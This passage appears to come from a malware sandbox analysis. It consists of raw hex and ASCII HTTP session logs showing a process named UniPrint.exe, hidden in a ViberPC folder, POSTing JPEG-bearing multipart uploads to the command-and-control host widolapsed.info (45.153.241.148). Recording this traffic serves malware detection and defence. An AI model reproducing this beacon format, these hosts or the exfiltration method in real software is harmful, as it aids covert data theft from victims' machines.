                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:52 UTC3254OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:52 UTC3270OUTData Raw: 2a c3 6d 14 32 ee 52 59 5a 47 82 e1 0f 20 30 20 0c a9 04 71 c8 ce 46 38 aa 34 9e 58 dd 9c b7 de dd b7 71 db bb 18 dd 8e 99 c7 19 eb 8e 2b 92 a6 15 4a a7 b4 3d 0a 58 f7 0a 3e ca dd 1f df 7f c8 78 a5 a4 a5 ae a3 cd 16 ac 40 dd 05 56 a9 ad fe f5 44 b6 34 a4 ed 23 5f 56 38 f0 d0 f7 6a e2 5f ad 76 7a cf 1e 1a 4f f7 ab 8b 73 cd 63 85 f8 1f a9 ea 57 f8 d7 a1 de 8e 3c 3b 65 f4 15 47 35 75 b8 f0 fd 88 ff 00 64 7f 2a a3 5c f4 7a fa 9a 62 1f bc bd 05 cd 19 a4 a4 ad 8e 7b 8e cd 28 6a 68 a2 8b 02 63 f2 69 db 8f ad 30 52 d4 b4 5a 6c 90 31 a7 06 35 10 a7 66 a5 a2 94 99 28 73 eb 4e 13 30 e8 c6 a1 06 96 a5 c5 16 a6 cb 4b 73 20 fe 23 52 ad e3 8e b8 35 48 1a 76 6a 1d 38 9a 2a b2 2f 8b cf ef 28 34 be 7c 2d f7 a3 15 43 34 a1 8d 4b a4 8b 55 59 7b 6d a3 f5 4c 52 7d 8e d1 ba 1c
                                                                                                      Data Ascii: *m2RYZG 0 qF84Xq+J=X>x@VD4#_V8j_vzOscW<;eG5ud*\zb{(jhci0RZl15f(sN0Ks #R5Hvj8*/(4|-C4KUY{mLR}
                                                                                                      2021-09-15 11:46:52 UTC3286OUTData Raw: 32 78 a3 15 af f6 4d 36 3f f5 97 40 fd 28 f3 74 88 ff 00 bc f4 bd bf 64 ca 58 67 d5 a4 64 e2 9e 23 73 c0 52 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13 a0 3a 9e 9e 9f 72 22 69 87 5c 89 7f d5 db 8a c2 a2 b7 58 58 75 39 1e 3e af 43 61 b5 f9 bf 82 35 15 03 eb 37 6d d1 b1 f4 ac ea 2a 96 1e 9a e8 64 f1 75 9f 52 db 6a 17 2f
                                                                                                      Data Ascii: 2xM6?@(tdXgd#sR:R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G:r"i\XXu9>Ca57m*duRj/
                                                                                                      2021-09-15 11:46:52 UTC3302OUTData Raw: 0a 28 a4 a0 05 a2 8a 28 00 a2 8a 28 00 a2 8a 29 80 b4 52 51 40 0b 49 4b 45 00 25 14 51 40 05 14 51 40 0b 45 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01 45 14 50 21 68 a4 a2 80 16 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 02 8a 28 a6 21 69 28 a2 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 a2 90 52 d3 10 52 d2 51 9a 00 5a 29 33 45 00 2d 19 a4 a2 80 17 34 52 52 d0 20 a2 8a 28 00 a5 a4 a5 a6 01 4b 49 45 00 2f 7a 28 a2 80 0a 29 29 69 80 b4 52 51 40 85 a2 92 96 80 16 8a 4a 29 88 5a 28 a2 80 16 92 8c d1 40 0b 45 14 50 01 4b 49 45 00 2d 02 92 96 98 85 a3 34 94 53 10 b9 a3 34 94 50 03 b3 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a
                                                                                                      Data Ascii: ((()RQ@IKE%Q@Q@E%Z-%PJ(h(`QE ((ZJ(hEP!hJ(h((!i((((RRQZ)3E-4RR (KIE/z())iRQ@J)Z(@EPKIE-4S4PE64
                                                                                                      2021-09-15 11:46:52 UTC3313OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 34 39 38 34 38 32 34 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1049848244--
                                                                                                      2021-09-15 11:46:53 UTC3313INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:52 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=ae99abf3bf0dd74eb25b0666ae5e7ba551751d7a451b075c661bd74524a90ba1; expires=Thu, 15-Sep-2022 11:46:52 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:53 UTC3313INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.34983445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:53 UTC3313OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76598
                                                                                                      Content-Type: multipart/form-data; boundary=--------3157952906
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:53 UTC3314OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 37 39 35 32 39 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3157952906Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:53 UTC3314OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e4 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:53 UTC3314OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:53 UTC3330OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:53 UTC3346OUTData Raw: a6 22 d1 49 4b 40 05 14 51 40 85 a2 92 96 90 05 14 51 40 82 96 92 96 90 05 2d 25 28 a0 42 8a 5a 4a 5a 42 16 ac 40 dd 05 56 a9 ad fe f5 44 b6 34 a4 ed 23 5f 56 38 f0 d0 f7 6a e2 5f ad 76 7a cf 1e 1a 4f f7 ab 8b 73 cd 63 85 f8 1f a9 ea 57 f8 d7 a1 de 8e 3c 3b 65 f4 15 47 35 75 b8 f0 fd 88 ff 00 64 7f 2a a3 5c f4 7a fa 9a 62 1f bc bd 05 cd 19 a4 a4 ad 8e 7b 8e cd 28 6a 68 a2 8b 02 63 f2 69 db 8f ad 30 52 d4 b4 5a 6c 90 31 a7 06 35 10 a7 66 a5 a2 94 99 28 73 eb 4e 13 30 e8 c6 a1 06 96 a5 c5 16 a6 cb 4b 73 20 fe 23 52 ad e3 8e b8 35 48 1a 76 6a 1d 38 9a 2a b2 2f 8b cf ef 28 34 be 7c 2d f7 a3 15 43 34 a1 8d 4b a4 8b 55 59 7b 6d a3 f5 4c 52 7d 8e d1 ba 1c 55 50 c6 9c 18 d4 f2 b5 b3 29 4e 2f 74 4a 74 c8 cf dd 7a 63 69 6d fc 2e 0d 01 cf 62 6a 41 33 8f e2 34 5e 6b
                                                                                                      Data Ascii: "IK@Q@Q@-%(BZJZB@VD4#_V8j_vzOscW<;eG5ud*\zb{(jhci0RZl15f(sN0Ks #R5Hvj8*/(4|-C4KUY{mLR}UP)N/tJtzcim.bjA34^k
                                                                                                      2021-09-15 11:46:53 UTC3362OUTData Raw: 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13 a0 3a 9e 9e 9f 72 22 69 87 5c 89 7f d5 db 8a c2 a2 b7 58 58 75 39 1e 3e af 43 61 b5 f9 bf 82 35 15 03 eb 37 6d d1 b1 f4 ac ea 2a 96 1e 9a e8 64 f1 75 9f 52 db 6a 17 2f f7 a5 6f ce 9b e7 48 dd 5c 9f c6 ab d3 96 af d9 c5 6c 89 55 a6 f7 64 bb 89 ea 4d 2e 69 a2 96 95 8b 52 6c 75
                                                                                                      Data Ascii: :R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G:r"i\XXu9>Ca57m*duRj/oH\lUdM.iRlu
                                                                                                      2021-09-15 11:46:53 UTC3378OUTData Raw: 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01 45 14 50 21 68 a4 a2 80 16 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 02 8a 28 a6 21 69 28 a2 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 a2 90 52 d3 10 52 d2 51 9a 00 5a 29 33 45 00 2d 19 a4 a2 80 17 34 52 52 d0 20 a2 8a 28 00 a5 a4 a5 a6 01 4b 49 45 00 2f 7a 28 a2 80 0a 29 29 69 80 b4 52 51 40 85 a2 92 96 80 16 8a 4a 29 88 5a 28 a2 80 16 92 8c d1 40 0b 45 14 50 01 4b 49 45 00 2d 02 92 96 98 85 a3 34 94 53 10 b9 a3 34 94 50 03 b3 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a 2e 16 1f 9a 33 4d a3 34 ee 2b 0e cd 26 69 b4 b9 a5 71 d8 5c d2 e6 9b 49 9a 2e 16 1d 46 69 33 45 17 0b 0e cd
                                                                                                      Data Ascii: %Z-%PJ(h(`QE ((ZJ(hEP!hJ(h((!i((((RRQZ)3E-4RR (KIE/z())iRQ@J)Z(@EPKIE-4S4PE64.3M4+&iq\I.Fi3E
                                                                                                      2021-09-15 11:46:53 UTC3388OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 37 39 35 32 39 30 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3157952906--
                                                                                                      2021-09-15 11:46:55 UTC3388INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:54 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=604e277c7db07013ab15a278c88c4a71d701b08f48e2238569e6e160f2c4daa3; expires=Thu, 15-Sep-2022 11:46:54 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:55 UTC3389INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.34975745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:30 UTC390OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83326
                                                                                                      Content-Type: multipart/form-data; boundary=--------2112300367
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:30 UTC390OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 31 32 33 30 30 33 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2112300367Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:30 UTC390OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b6 bc 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:30 UTC391OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:30 UTC407OUTData Raw: 3d 45 5c 35 4d 8f ef 5f fd e3 5f 2f 51 2d cf 5e 2c 91 4d 78 c6 bd ff 00 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 99 4d 78 ce bd ff 00 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 0c b3 e2 91 cb 8b d9 14 29 69 29 6b d9 38 82 8c 51 45 02 0c 57 a7 fc 29 e3 49 be ff 00 ae e3 ff 00 41 af 30 af 4e f8 55 ff 00 20 9b ef fa ee 3f f4 1a ce af c2 69 4f e2 3b aa 4a c9 b1 b5 81 f4 9b 6b 9b 99 ee b2 d0 2c 92 39 bb 94 0f ba 09 3f 7a ac a5 85 ac 91 ab c7 35 d3 2b 0c 82 2f 25 c1 1f f7 d5 62 e3 14 f7 fc 3f e0 9a 29 49 ad bf 1f f8 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e
                                                                                                      Data Ascii: =E\5M__/Q-^,Mx#_RfMx#_Rf)i)k8QEW)IA0NU ?iO;Jk,9?z5+/%b?)IMR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n
                                                                                                      2021-09-15 11:45:30 UTC423OUTData Raw: ff 00 a6 cb fe f5 33 4e ff 00 8f e8 be b4 b7 67 37 52 7f bd 58 7f cb d2 df f0 c8 a9 28 a2 b5 31 16 8a 4a 5a 00 28 a2 8a 04 2d 14 94 b4 80 28 a2 8a 04 14 b4 94 b4 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7
                                                                                                      Data Ascii: 3Ng7RX(1JZ(-()i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4
                                                                                                      2021-09-15 11:45:30 UTC439OUTData Raw: 57 a1 b0 da fc df c1 1a 8a 81 f5 9b b6 e8 d8 fa 56 75 15 4b 0f 4d 74 32 78 ba cf a9 6d b5 0b 97 fb d2 b7 e7 4d f3 a4 6e ae 4f e3 55 e9 cb 57 ec e2 b6 44 aa d3 7b b2 5d c4 f5 26 97 34 d1 4b 4a c5 a9 36 3a 9c 29 b9 a5 cd 22 d3 1d 9a 70 35 1d 3c 52 68 a4 c7 d2 8a 68 a5 a9 34 4c 75 38 53 01 a7 64 52 29 31 d9 a7 0a 66 69 72 6a 5a 2d 32 4a 29 a0 9a 5f a9 a4 d1 49 8f 14 b9 15 1e f4 1d 58 7e 74 c6 b9 81 3a b8 34 b9 58 73 a5 d4 b2 0f ca 7e 95 c6 78 a3 fe 3f 62 ff 00 ae 42 ba 63 a9 40 b9 03 26 b9 9f 12 9c dd c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c
                                                                                                      Data Ascii: WVuKMt2xmMnOUWD{]&4KJ6:)"p5<Rhh4Lu8SdR)1firjZ-2J)_IX~t:4Xs~x?bBc@&uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),
                                                                                                      2021-09-15 11:45:30 UTC455OUTData Raw: fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d3 25 bb be 80 23 cf 69 6c 23 69 11 09 4b 86 24 6e 60 b9 c1 41 9e be b4 f9 1f f4 d0 b9 d7 f4 99 7e 8a 28 a8 2c 2b ca fe
                                                                                                      Data Ascii: nG4LES5?tyZS9s2OjiMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?tyZS9s2O%#il#iK$n`A~(,+
